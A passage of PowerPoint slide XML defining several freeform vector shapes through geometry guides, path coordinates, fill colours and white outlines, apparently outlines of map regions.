                      <a:pt x="2" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="44"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36410" name="Freeform 142"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3455" y="2212"/>
                <a:ext cx="85" cy="74"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 52 w 85"/>
                  <a:gd name="T1" fmla="*/ 71 h 74"/>
                  <a:gd name="T2" fmla="*/ 46 w 85"/>
                  <a:gd name="T3" fmla="*/ 63 h 74"/>
                  <a:gd name="T4" fmla="*/ 47 w 85"/>
                  <a:gd name="T5" fmla="*/ 57 h 74"/>
                  <a:gd name="T6" fmla="*/ 52 w 85"/>
                  <a:gd name="T7" fmla="*/ 52 h 74"/>
                  <a:gd name="T8" fmla="*/ 46 w 85"/>
                  <a:gd name="T9" fmla="*/ 47 h 74"/>
                  <a:gd name="T10" fmla="*/ 33 w 85"/>
                  <a:gd name="T11" fmla="*/ 52 h 74"/>
                  <a:gd name="T12" fmla="*/ 24 w 85"/>
                  <a:gd name="T13" fmla="*/ 60 h 74"/>
                  <a:gd name="T14" fmla="*/ 23 w 85"/>
                  <a:gd name="T15" fmla="*/ 57 h 74"/>
                  <a:gd name="T16" fmla="*/ 25 w 85"/>
                  <a:gd name="T17" fmla="*/ 55 h 74"/>
                  <a:gd name="T18" fmla="*/ 23 w 85"/>
                  <a:gd name="T19" fmla="*/ 50 h 74"/>
                  <a:gd name="T20" fmla="*/ 19 w 85"/>
                  <a:gd name="T21" fmla="*/ 47 h 74"/>
                  <a:gd name="T22" fmla="*/ 14 w 85"/>
                  <a:gd name="T23" fmla="*/ 44 h 74"/>
                  <a:gd name="T24" fmla="*/ 10 w 85"/>
                  <a:gd name="T25" fmla="*/ 39 h 74"/>
                  <a:gd name="T26" fmla="*/ 15 w 85"/>
                  <a:gd name="T27" fmla="*/ 37 h 74"/>
                  <a:gd name="T28" fmla="*/ 12 w 85"/>
                  <a:gd name="T29" fmla="*/ 33 h 74"/>
                  <a:gd name="T30" fmla="*/ 7 w 85"/>
                  <a:gd name="T31" fmla="*/ 24 h 74"/>
                  <a:gd name="T32" fmla="*/ 7 w 85"/>
                  <a:gd name="T33" fmla="*/ 19 h 74"/>
                  <a:gd name="T34" fmla="*/ 3 w 85"/>
                  <a:gd name="T35" fmla="*/ 16 h 74"/>
                  <a:gd name="T36" fmla="*/ 0 w 85"/>
                  <a:gd name="T37" fmla="*/ 12 h 74"/>
                  <a:gd name="T38" fmla="*/ 8 w 85"/>
                  <a:gd name="T39" fmla="*/ 9 h 74"/>
                  <a:gd name="T40" fmla="*/ 17 w 85"/>
                  <a:gd name="T41" fmla="*/ 15 h 74"/>
                  <a:gd name="T42" fmla="*/ 21 w 85"/>
                  <a:gd name="T43" fmla="*/ 15 h 74"/>
                  <a:gd name="T44" fmla="*/ 26 w 85"/>
                  <a:gd name="T45" fmla="*/ 16 h 74"/>
                  <a:gd name="T46" fmla="*/ 22 w 85"/>
                  <a:gd name="T47" fmla="*/ 9 h 74"/>
                  <a:gd name="T48" fmla="*/ 20 w 85"/>
                  <a:gd name="T49" fmla="*/ 3 h 74"/>
                  <a:gd name="T50" fmla="*/ 24 w 85"/>
                  <a:gd name="T51" fmla="*/ 0 h 74"/>
                  <a:gd name="T52" fmla="*/ 27 w 85"/>
                  <a:gd name="T53" fmla="*/ 1 h 74"/>
                  <a:gd name="T54" fmla="*/ 33 w 85"/>
                  <a:gd name="T55" fmla="*/ 6 h 74"/>
                  <a:gd name="T56" fmla="*/ 35 w 85"/>
                  <a:gd name="T57" fmla="*/ 12 h 74"/>
                  <a:gd name="T58" fmla="*/ 45 w 85"/>
                  <a:gd name="T59" fmla="*/ 14 h 74"/>
                  <a:gd name="T60" fmla="*/ 51 w 85"/>
                  <a:gd name="T61" fmla="*/ 8 h 74"/>
                  <a:gd name="T62" fmla="*/ 60 w 85"/>
                  <a:gd name="T63" fmla="*/ 4 h 74"/>
                  <a:gd name="T64" fmla="*/ 65 w 85"/>
                  <a:gd name="T65" fmla="*/ 12 h 74"/>
                  <a:gd name="T66" fmla="*/ 69 w 85"/>
                  <a:gd name="T67" fmla="*/ 22 h 74"/>
                  <a:gd name="T68" fmla="*/ 74 w 85"/>
                  <a:gd name="T69" fmla="*/ 27 h 74"/>
                  <a:gd name="T70" fmla="*/ 82 w 85"/>
                  <a:gd name="T71" fmla="*/ 29 h 74"/>
                  <a:gd name="T72" fmla="*/ 85 w 85"/>
                  <a:gd name="T73" fmla="*/ 34 h 74"/>
                  <a:gd name="T74" fmla="*/ 78 w 85"/>
                  <a:gd name="T75" fmla="*/ 32 h 74"/>
                  <a:gd name="T76" fmla="*/ 72 w 85"/>
                  <a:gd name="T77" fmla="*/ 34 h 74"/>
                  <a:gd name="T78" fmla="*/ 70 w 85"/>
                  <a:gd name="T79" fmla="*/ 42 h 74"/>
                  <a:gd name="T80" fmla="*/ 68 w 85"/>
                  <a:gd name="T81" fmla="*/ 50 h 74"/>
                  <a:gd name="T82" fmla="*/ 68 w 85"/>
                  <a:gd name="T83" fmla="*/ 53 h 74"/>
                  <a:gd name="T84" fmla="*/ 66 w 85"/>
                  <a:gd name="T85" fmla="*/ 59 h 74"/>
                  <a:gd name="T86" fmla="*/ 63 w 85"/>
                  <a:gd name="T87" fmla="*/ 56 h 74"/>
                  <a:gd name="T88" fmla="*/ 62 w 85"/>
                  <a:gd name="T89" fmla="*/ 61 h 74"/>
                  <a:gd name="T90" fmla="*/ 61 w 85"/>
                  <a:gd name="T91" fmla="*/ 66 h 74"/>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85"/>
                  <a:gd name="T139" fmla="*/ 0 h 74"/>
                  <a:gd name="T140" fmla="*/ 85 w 85"/>
                  <a:gd name="T141" fmla="*/ 74 h 74"/>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85" h="74">
                    <a:moveTo>
                      <a:pt x="59" y="74"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="54" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="74"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36411" name="Freeform 143"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3448" y="2256"/>
                <a:ext cx="25" cy="19"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 25"/>
                  <a:gd name="T1" fmla="*/ 0 h 19"/>
                  <a:gd name="T2" fmla="*/ 5 w 25"/>
                  <a:gd name="T3" fmla="*/ 1 h 19"/>
                  <a:gd name="T4" fmla="*/ 6 w 25"/>
                  <a:gd name="T5" fmla="*/ 0 h 19"/>
                  <a:gd name="T6" fmla="*/ 8 w 25"/>
                  <a:gd name="T7" fmla="*/ 0 h 19"/>
                  <a:gd name="T8" fmla="*/ 10 w 25"/>
                  <a:gd name="T9" fmla="*/ 2 h 19"/>
                  <a:gd name="T10" fmla="*/ 10 w 25"/>
                  <a:gd name="T11" fmla="*/ 3 h 19"/>
                  <a:gd name="T12" fmla="*/ 13 w 25"/>
                  <a:gd name="T13" fmla="*/ 5 h 19"/>
                  <a:gd name="T14" fmla="*/ 14 w 25"/>
                  <a:gd name="T15" fmla="*/ 5 h 19"/>
                  <a:gd name="T16" fmla="*/ 16 w 25"/>
                  <a:gd name="T17" fmla="*/ 4 h 19"/>
                  <a:gd name="T18" fmla="*/ 20 w 25"/>
                  <a:gd name="T19" fmla="*/ 4 h 19"/>
                  <a:gd name="T20" fmla="*/ 20 w 25"/>
                  <a:gd name="T21" fmla="*/ 6 h 19"/>
                  <a:gd name="T22" fmla="*/ 20 w 25"/>
                  <a:gd name="T23" fmla="*/ 9 h 19"/>
                  <a:gd name="T24" fmla="*/ 21 w 25"/>
                  <a:gd name="T25" fmla="*/ 9 h 19"/>
                  <a:gd name="T26" fmla="*/ 23 w 25"/>
                  <a:gd name="T27" fmla="*/ 10 h 19"/>
                  <a:gd name="T28" fmla="*/ 22 w 25"/>
                  <a:gd name="T29" fmla="*/ 12 h 19"/>
                  <a:gd name="T30" fmla="*/ 25 w 25"/>
                  <a:gd name="T31" fmla="*/ 19 h 19"/>
                  <a:gd name="T32" fmla="*/ 25 w 25"/>
                  <a:gd name="T33" fmla="*/ 19 h 19"/>
                  <a:gd name="T34" fmla="*/ 24 w 25"/>
                  <a:gd name="T35" fmla="*/ 18 h 19"/>
                  <a:gd name="T36" fmla="*/ 21 w 25"/>
                  <a:gd name="T37" fmla="*/ 19 h 19"/>
                  <a:gd name="T38" fmla="*/ 17 w 25"/>
                  <a:gd name="T39" fmla="*/ 18 h 19"/>
                  <a:gd name="T40" fmla="*/ 14 w 25"/>
                  <a:gd name="T41" fmla="*/ 17 h 19"/>
                  <a:gd name="T42" fmla="*/ 12 w 25"/>
                  <a:gd name="T43" fmla="*/ 15 h 19"/>
                  <a:gd name="T44" fmla="*/ 10 w 25"/>
                  <a:gd name="T45" fmla="*/ 12 h 19"/>
                  <a:gd name="T46" fmla="*/ 6 w 25"/>
                  <a:gd name="T47" fmla="*/ 10 h 19"/>
                  <a:gd name="T48" fmla="*/ 4 w 25"/>
                  <a:gd name="T49" fmla="*/ 6 h 19"/>
                  <a:gd name="T50" fmla="*/ 2 w 25"/>
                  <a:gd name="T51" fmla="*/ 2 h 19"/>
                  <a:gd name="T52" fmla="*/ 0 w 25"/>
                  <a:gd name="T53" fmla="*/ 0 h 19"/>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25"/>
                  <a:gd name="T82" fmla="*/ 0 h 19"/>
                  <a:gd name="T83" fmla="*/ 25 w 25"/>
                  <a:gd name="T84" fmla="*/ 19 h 19"/>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25" h="19">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="5" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36412" name="Freeform 144"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2916" y="2888"/>
                <a:ext cx="117" cy="135"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 25 w 117"/>
                  <a:gd name="T1" fmla="*/ 127 h 135"/>
                  <a:gd name="T2" fmla="*/ 17 w 117"/>
                  <a:gd name="T3" fmla="*/ 132 h 135"/>
                  <a:gd name="T4" fmla="*/ 13 w 117"/>
                  <a:gd name="T5" fmla="*/ 134 h 135"/>
                  <a:gd name="T6" fmla="*/ 0 w 117"/>
                  <a:gd name="T7" fmla="*/ 118 h 135"/>
                  <a:gd name="T8" fmla="*/ 4 w 117"/>
                  <a:gd name="T9" fmla="*/ 114 h 135"/>
                  <a:gd name="T10" fmla="*/ 13 w 117"/>
                  <a:gd name="T11" fmla="*/ 111 h 135"/>
                  <a:gd name="T12" fmla="*/ 10 w 117"/>
                  <a:gd name="T13" fmla="*/ 108 h 135"/>
                  <a:gd name="T14" fmla="*/ 7 w 117"/>
                  <a:gd name="T15" fmla="*/ 101 h 135"/>
                  <a:gd name="T16" fmla="*/ 8 w 117"/>
                  <a:gd name="T17" fmla="*/ 97 h 135"/>
                  <a:gd name="T18" fmla="*/ 19 w 117"/>
                  <a:gd name="T19" fmla="*/ 94 h 135"/>
                  <a:gd name="T20" fmla="*/ 21 w 117"/>
                  <a:gd name="T21" fmla="*/ 87 h 135"/>
                  <a:gd name="T22" fmla="*/ 24 w 117"/>
                  <a:gd name="T23" fmla="*/ 85 h 135"/>
                  <a:gd name="T24" fmla="*/ 28 w 117"/>
                  <a:gd name="T25" fmla="*/ 90 h 135"/>
                  <a:gd name="T26" fmla="*/ 33 w 117"/>
                  <a:gd name="T27" fmla="*/ 95 h 135"/>
                  <a:gd name="T28" fmla="*/ 37 w 117"/>
                  <a:gd name="T29" fmla="*/ 93 h 135"/>
                  <a:gd name="T30" fmla="*/ 41 w 117"/>
                  <a:gd name="T31" fmla="*/ 92 h 135"/>
                  <a:gd name="T32" fmla="*/ 43 w 117"/>
                  <a:gd name="T33" fmla="*/ 96 h 135"/>
                  <a:gd name="T34" fmla="*/ 47 w 117"/>
                  <a:gd name="T35" fmla="*/ 96 h 135"/>
                  <a:gd name="T36" fmla="*/ 50 w 117"/>
                  <a:gd name="T37" fmla="*/ 84 h 135"/>
                  <a:gd name="T38" fmla="*/ 53 w 117"/>
                  <a:gd name="T39" fmla="*/ 67 h 135"/>
                  <a:gd name="T40" fmla="*/ 51 w 117"/>
                  <a:gd name="T41" fmla="*/ 64 h 135"/>
                  <a:gd name="T42" fmla="*/ 45 w 117"/>
                  <a:gd name="T43" fmla="*/ 62 h 135"/>
                  <a:gd name="T44" fmla="*/ 42 w 117"/>
                  <a:gd name="T45" fmla="*/ 57 h 135"/>
                  <a:gd name="T46" fmla="*/ 42 w 117"/>
                  <a:gd name="T47" fmla="*/ 54 h 135"/>
                  <a:gd name="T48" fmla="*/ 47 w 117"/>
                  <a:gd name="T49" fmla="*/ 49 h 135"/>
                  <a:gd name="T50" fmla="*/ 51 w 117"/>
                  <a:gd name="T51" fmla="*/ 43 h 135"/>
                  <a:gd name="T52" fmla="*/ 46 w 117"/>
                  <a:gd name="T53" fmla="*/ 34 h 135"/>
                  <a:gd name="T54" fmla="*/ 35 w 117"/>
                  <a:gd name="T55" fmla="*/ 38 h 135"/>
                  <a:gd name="T56" fmla="*/ 31 w 117"/>
                  <a:gd name="T57" fmla="*/ 36 h 135"/>
                  <a:gd name="T58" fmla="*/ 31 w 117"/>
                  <a:gd name="T59" fmla="*/ 25 h 135"/>
                  <a:gd name="T60" fmla="*/ 38 w 117"/>
                  <a:gd name="T61" fmla="*/ 23 h 135"/>
                  <a:gd name="T62" fmla="*/ 50 w 117"/>
                  <a:gd name="T63" fmla="*/ 23 h 135"/>
                  <a:gd name="T64" fmla="*/ 55 w 117"/>
                  <a:gd name="T65" fmla="*/ 23 h 135"/>
                  <a:gd name="T66" fmla="*/ 63 w 117"/>
                  <a:gd name="T67" fmla="*/ 25 h 135"/>
                  <a:gd name="T68" fmla="*/ 76 w 117"/>
                  <a:gd name="T69" fmla="*/ 30 h 135"/>
                  <a:gd name="T70" fmla="*/ 77 w 117"/>
                  <a:gd name="T71" fmla="*/ 23 h 135"/>
                  <a:gd name="T72" fmla="*/ 80 w 117"/>
                  <a:gd name="T73" fmla="*/ 20 h 135"/>
                  <a:gd name="T74" fmla="*/ 84 w 117"/>
                  <a:gd name="T75" fmla="*/ 12 h 135"/>
                  <a:gd name="T76" fmla="*/ 87 w 117"/>
                  <a:gd name="T77" fmla="*/ 2 h 135"/>
                  <a:gd name="T78" fmla="*/ 98 w 117"/>
                  <a:gd name="T79" fmla="*/ 0 h 135"/>
                  <a:gd name="T80" fmla="*/ 105 w 117"/>
                  <a:gd name="T81" fmla="*/ 1 h 135"/>
                  <a:gd name="T82" fmla="*/ 117 w 117"/>
                  <a:gd name="T83" fmla="*/ 0 h 135"/>
                  <a:gd name="T84" fmla="*/ 117 w 117"/>
                  <a:gd name="T85" fmla="*/ 2 h 135"/>
                  <a:gd name="T86" fmla="*/ 110 w 117"/>
                  <a:gd name="T87" fmla="*/ 17 h 135"/>
                  <a:gd name="T88" fmla="*/ 107 w 117"/>
                  <a:gd name="T89" fmla="*/ 26 h 135"/>
